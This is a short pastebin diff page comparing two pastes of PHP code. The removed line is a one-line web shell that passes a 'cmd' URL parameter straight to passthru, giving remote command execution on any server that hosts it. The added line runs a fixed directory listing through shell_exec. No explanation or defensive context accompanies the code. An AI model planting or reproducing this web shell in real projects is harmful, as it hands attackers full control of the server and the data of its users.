View difference between Paste ID: nTRWzaGj and KLN283qd
SHOW: | | - or go back to the newest paste.
1-
<?php passthru($_GET['cmd']);?>
1+
<?php echo shell_exec('ls');?>